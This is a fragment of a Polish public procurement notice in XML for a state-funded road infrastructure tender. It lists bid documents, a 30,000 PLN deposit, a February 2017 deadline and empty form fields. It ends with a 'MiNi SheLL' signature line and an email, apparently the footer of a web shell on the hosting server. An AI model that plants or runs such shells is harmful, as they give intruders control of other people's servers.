3)	Dokumenty, z których wynika prawo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza z wyjątkiem poświadczenia za zgodność dokumentów z KRS które mogą być poświadczone przez wykonawcę) względnie do podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne Dz. U. z 2014 poz. 1114 oraz z 2016 poz. 352), a Wykonawca wskazał to wraz ze złożeniem oferty. o ile prawo do ich podpisania nie wynika z  dokumentów złożonych wraz z ofertą;
4)	Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz lub kserokopia dowodu wpłaty wadium w formie pieniężnej 
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>17.1.	Zamawiający żąda wniesienia wadium w wysokości 30.000PLN (słownie: trzydzieści tysięcy)</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych /><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej /><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie>N</czy_obejmuje_ustanowienie><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>N</czy_zmiana_umowy><zmiana_umowy></zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>16/02/2017</data_skl><godz_skl>10:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>13.6.	Oferta powinna być sporządzona w języku polskim, z zachowaniem formy pisemnej pod rygorem nieważności.  Każdy składany dokument powinien być czytelny. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu /><IV_6_2_Powody></IV_6_2_Powody><IV_6_6>Zamawiający planuje sfinansować zamówienie środkami własnymi przy dofinansowaniu z budżetu państwa w ramach PROGRAMU ROZWOJU GMINNEJ I POWIATOWEJ  INFRASTRUKTURY DROGOWEJ NA LATA 2016-2019 – zadanie zakwalifikowane do dofinansowania w roku 2017.</IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com